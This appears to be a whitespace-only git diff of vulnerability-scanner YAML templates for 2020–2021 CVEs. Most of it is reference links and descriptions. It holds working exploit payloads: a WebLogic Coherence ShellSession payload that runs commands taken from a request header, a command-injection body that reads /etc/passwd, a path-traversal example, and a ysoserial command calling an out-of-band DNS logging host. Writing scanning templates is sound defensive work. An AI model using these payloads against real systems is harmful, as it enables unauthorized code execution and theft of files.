(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+ test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
matchers-condition: and
matchers:
diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml
index 67847810d6..247fac361d 100644
--- a/cves/2020/CVE-2020-15148.yaml
+++ b/cves/2020/CVE-2020-15148.yaml
@@ -5,8 +5,8 @@ info:
author: pikpikcu
severity: high
reference:
- - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
- - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+ - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
+ - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
tags: cve,cve2020,rce,yii
requests:
diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml
index 4b1e65c8a7..474fa19f0a 100644
--- a/cves/2020/CVE-2020-15227.yaml
+++ b/cves/2020/CVE-2020-15227.yaml
@@ -6,10 +6,10 @@ info:
severity: high
description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
- - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
- - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
- - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
+ - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
+ - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
+ - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
tags: cve,cve2020,nette,rce
requests:
diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml
index 1e84564e2d..e85004b3b3 100644
--- a/cves/2020/CVE-2020-21224.yaml
+++ b/cves/2020/CVE-2020-21224.yaml
@@ -17,7 +17,7 @@ requests:
Referer: "{{Hostname}}/module/login/login.html"
body: |
- op=login&username=;`cat /etc/passwd`&password=
+ op=login&username=;`cat /etc/passwd`&password=
matchers-condition: and
matchers:
diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml
index 5ef1db5c75..9222bdaf5d 100644
--- a/cves/2020/CVE-2020-27866.yaml
+++ b/cves/2020/CVE-2020-27866.yaml
@@ -7,9 +7,9 @@ info:
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
tags: cve,cve2020,netgear,auth-bypass
reference:
- - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
+ - https://wzt.ac.cn/2021/01/13/AC2400_vuln/
+ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
requests:
- raw:
diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml
index fa8541d74b..dcb73a8bf5 100644
--- a/cves/2020/CVE-2020-27986.yaml
+++ b/cves/2020/CVE-2020-27986.yaml
@@ -5,9 +5,9 @@ info:
author: pikpikcu
severity: medium
description: |
- SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
- SVN, and GitLab credentials via the api/settings/values URI.
- NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
+ SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
+ SVN, and GitLab credentials via the api/settings/values URI.
+ NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
tags: cve,cve2020,sonarqube
diff --git a/cves/2020/CVE-2020-36112.yaml b/cves/2020/CVE-2020-36112.yaml
index 522d6d82c3..f5a620db25 100644
--- a/cves/2020/CVE-2020-36112.yaml
+++ b/cves/2020/CVE-2020-36112.yaml
@@ -5,8 +5,8 @@ info:
author: geeknik
description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.
reference:
- - https://www.exploit-db.com/exploits/49314
- - https://www.tenable.com/cve/CVE-2020-36112
+ - https://www.exploit-db.com/exploits/49314
+ - https://www.tenable.com/cve/CVE-2020-36112
severity: critical
tags: cve,cve2020,sqli,cse
diff --git a/cves/2020/CVE-2020-36289.yaml b/cves/2020/CVE-2020-36289.yaml
index 22359eda5d..9b1cb65ed5 100644
--- a/cves/2020/CVE-2020-36289.yaml
+++ b/cves/2020/CVE-2020-36289.yaml
@@ -7,8 +7,8 @@ info:
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
tags: cve,cve2020,jira,atlassian
reference:
- - https://twitter.com/ptswarm/status/1402644004781633540
- - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
+ - https://twitter.com/ptswarm/status/1402644004781633540
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml
index 175c159ba9..81f8a02ae5 100644
--- a/cves/2020/CVE-2020-5307.yaml
+++ b/cves/2020/CVE-2020-5307.yaml
@@ -5,7 +5,7 @@ info:
author: gy741
description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
reference:
- - https://cinzinga.com/CVE-2020-5307-5308/
+ - https://cinzinga.com/CVE-2020-5307-5308/
severity: critical
tags: cve,cve2020,sqli
diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml
index 2d8af1dd8c..a4df4fd3d9 100644
--- a/cves/2020/CVE-2020-7209.yaml
+++ b/cves/2020/CVE-2020-7209.yaml
@@ -13,8 +13,8 @@ info:
- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
- https://www.hpe.com/us/en/home.html # vendor homepage
- # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
- # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
+# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
+# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index 0a0e1ce779..4db2ab02e8 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -7,8 +7,8 @@ info:
tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference:
- - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
+ - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
+ - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
requests:
- payloads:
diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml
index 29298339ca..cd341cf256 100644
--- a/cves/2020/CVE-2020-9490.yaml
+++ b/cves/2020/CVE-2020-9490.yaml
@@ -7,10 +7,10 @@ info:
author: philippedelteil
tags: cve,cve2020,apache,dos
reference:
- - https://httpd.apache.org/security/vulnerabilities_24.html
- - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
- - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
- - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
+ - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml
index 9f70517315..9c9c57c372 100644
--- a/cves/2021/CVE-2021-20090.yaml
+++ b/cves/2021/CVE-2021-20090.yaml
@@ -7,9 +7,9 @@ info:
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20090
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,lfi,buffalo,firmware,iot
requests:
diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml
index 55bd86f160..6ac0d4f526 100644
--- a/cves/2021/CVE-2021-20091.yaml
+++ b/cves/2021/CVE-2021-20091.yaml
@@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml
index 306d94127d..6b175dab6d 100644
--- a/cves/2021/CVE-2021-20092.yaml
+++ b/cves/2021/CVE-2021-20092.yaml
@@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: cve,cve2021,buffalo,firmware,iot
requests:
diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml
index 216727adc8..cdd020bddc 100644
--- a/cves/2021/CVE-2021-21307.yaml
+++ b/cves/2021/CVE-2021-21307.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
reference:
- - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
- - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
+ - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
+ - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
tags: cve,cve2021,rce,lucee,adobe
requests:
diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml
index ffaac3c2bc..51523e26ab 100644
--- a/cves/2021/CVE-2021-22214.yaml
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -6,9 +6,9 @@ info:
severity: medium
description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
- - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
- - https://docs.gitlab.com/ee/api/lint.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
+ - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
+ - https://docs.gitlab.com/ee/api/lint.html
tags: cve,cve2021,gitlab,ssrf,oob
requests:
diff --git a/cves/2021/CVE-2021-24176.yaml b/cves/2021/CVE-2021-24176.yaml
index 8b18bc6ce9..54bede3572 100644
--- a/cves/2021/CVE-2021-24176.yaml
+++ b/cves/2021/CVE-2021-24176.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference:
- - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- - https://wordpress.org/plugins/jh-404-logger/
+ - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
+ - https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
requests:
diff --git a/cves/2021/CVE-2021-24237.yaml b/cves/2021/CVE-2021-24237.yaml
index 6a8ba89710..365eb7c2d9 100644
--- a/cves/2021/CVE-2021-24237.yaml
+++ b/cves/2021/CVE-2021-24237.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,realteo,xss,wordpress
reference:
- - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+ - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
+ - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24285.yaml b/cves/2021/CVE-2021-24285.yaml
index 9d7f344e7d..8f67d63102 100644
--- a/cves/2021/CVE-2021-24285.yaml
+++ b/cves/2021/CVE-2021-24285.yaml
@@ -7,9 +7,9 @@ info:
description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.
tags: cve,cve2021,wordpress,wp-plugin,sqli
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
- - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
- - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24285
+ - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/
+ - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162
requests:
- raw:
diff --git a/cves/2021/CVE-2021-24316.yaml b/cves/2021/CVE-2021-24316.yaml
index 036761fd15..f4b9b78af4 100644
--- a/cves/2021/CVE-2021-24316.yaml
+++ b/cves/2021/CVE-2021-24316.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,mediumish,xss,wordpress
reference:
- - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
- - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
+ - https://wpscan.com/vulnerability/57e27de4-58f5-46aa-9b59-809705733b2e
+ - https://m0ze.ru/vulnerability/%5B2021-03-14%5D-%5BWordPress%5D-%5BCWE-79%5D-Mediumish-WordPress-Theme-v1.0.47.txt
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml
index 4fae911bf5..1c13d872ec 100644
--- a/cves/2021/CVE-2021-24495.yaml
+++ b/cves/2021/CVE-2021-24495.yaml
@@ -6,8 +6,8 @@ info:
severity: medium
tags: cve,cve2021,wp-plugin,wordpress,xss
reference:
- - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
- - https://wordpress.org/plugins/marmoset-viewer/#developers
+ - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
+ - https://wordpress.org/plugins/marmoset-viewer/#developers
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-25646.yaml b/cves/2021/CVE-2021-25646.yaml
index a1128591fe..23c3e6d3dc 100644
--- a/cves/2021/CVE-2021-25646.yaml
+++ b/cves/2021/CVE-2021-25646.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
reference: https://paper.seebug.org/1476/
description: |
- Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
- Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
+ Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
+ Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
tags: cve,cve2021,apache,rce
requests:
diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml
index 95539c89b6..3044206eb1 100644
--- a/cves/2021/CVE-2021-26295.yaml
+++ b/cves/2021/CVE-2021-26295.yaml
@@ -10,9 +10,9 @@ info:
- https://lists.apache.org/thread.html/r3c1802eaf34aa78a61b4e8e044c214bc94accbd28a11f3a276586a31%40%3Cuser.ofbiz.apache.org%3E
- https://lists.apache.org/thread.html/r6e4579c4ebf7efeb462962e359501c6ca4045687f12212551df2d607@%3Cnotifications.ofbiz.apache.org%3E
- # Note:- This is detection template, To perform deserializes do as below
- # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
- # `cat mad.ot | hex` and replace in along with the url in std-String value
+# Note:- This is detection template, To perform deserializes do as below
+# java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot
+# `cat mad.ot | hex` and replace in along with the url in std-String value
requests:
- raw:
diff --git a/cves/2021/CVE-2021-26812.yaml b/cves/2021/CVE-2021-26812.yaml
index ae38d892b3..032841467b 100644
--- a/cves/2021/CVE-2021-26812.yaml
+++ b/cves/2021/CVE-2021-26812.yaml
@@ -7,8 +7,8 @@ info:
severity: medium
tags: cve,cve2021,moodle,jitsi,xss
reference:
- - https://github.com/udima-university/moodle-mod_jitsi/issues/67
- - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
+ - https://github.com/udima-university/moodle-mod_jitsi/issues/67
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml
index a630ca1cab..eeaa087bd7 100644
--- a/cves/2021/CVE-2021-26855.yaml
+++ b/cves/2021/CVE-2021-26855.yaml
@@ -5,13 +5,13 @@ info:
author: madrobot
severity: critical
description: |
- Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
+ Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange,oob
reference:
- - https://proxylogon.com/#timeline
- - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
+ - https://proxylogon.com/#timeline
+ - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
+ - https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
+ - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:
diff --git a/cves/2021/CVE-2021-27651.yaml b/cves/2021/CVE-2021-27651.yaml
index e3038cb194..0b53b90095 100644
--- a/cves/2021/CVE-2021-27651.yaml
+++ b/cves/2021/CVE-2021-27651.yaml
@@ -5,8 +5,8 @@ info:
author: idealphase
description: In versions 8.2.1 through 8.5.2 of Pega Infinity, the password reset functionality for local accounts can be used to bypass local authentication checks.
reference:
- - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
- - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
+ - https://github.com/samwcyo/CVE-2021-27651-PoC/blob/main/RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27651
severity: critical
tags: cve,cve2021,pega,auth-bypass
diff --git a/cves/2021/CVE-2021-27850.yaml b/cves/2021/CVE-2021-27850.yaml
index d1f3b5f64f..09c5027755 100644
--- a/cves/2021/CVE-2021-27850.yaml
+++ b/cves/2021/CVE-2021-27850.yaml
@@ -7,7 +7,7 @@ info:
author: pdteam
severity: critical
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27850
tags: cve,cve2021,apache,tapestry
requests:
diff --git a/cves/2021/CVE-2021-27905.yaml b/cves/2021/CVE-2021-27905.yaml
index cdfbaa9e20..b14c3ad7df 100644
--- a/cves/2021/CVE-2021-27905.yaml
+++ b/cves/2021/CVE-2021-27905.yaml
@@ -7,10 +7,10 @@ info:
tags: cve,cve2021,apache,solr,ssrf
description: The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.
reference:
- - https://www.anquanke.com/post/id/238201
- - https://ubuntu.com/security/CVE-2021-27905
- - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
+ - https://www.anquanke.com/post/id/238201
+ - https://ubuntu.com/security/CVE-2021-27905
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-27905
+ - https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/
requests:
- raw:
diff --git a/cves/2021/CVE-2021-28073.yaml b/cves/2021/CVE-2021-28073.yaml
index aa5d34e1b3..0414c2d4fc 100644
--- a/cves/2021/CVE-2021-28073.yaml
+++ b/cves/2021/CVE-2021-28073.yaml
@@ -7,8 +7,8 @@ info:
description: Ntopng is a passive network monitoring tool focused on flows and statistics that can be obtained from the traffic captured by the server. There is a authentication bypass vulnerability in ntopng <= 4.2
tags: ntopng,cve,cve2021
reference:
- - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
- - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
+ - http://noahblog.360.cn/ntopng-multiple-vulnerabilities/
+ - https://github.com/AndreaOm/docs/blob/c27d2db8dbedb35c9e69109898aaecd0f849186a/wikipoc/PeiQi_Wiki/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/HongKe/HongKe%20ntopng%20%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%20CVE-2021-28073.md
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-28149.yaml b/cves/2021/CVE-2021-28149.yaml
index 53d98b7bfd..cd88038cd7 100644
--- a/cves/2021/CVE-2021-28149.yaml
+++ b/cves/2021/CVE-2021-28149.yaml
@@ -5,7 +5,7 @@ info:
author: gy741
severity: medium
description: |
- Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
+ Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
reference:
- https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28149
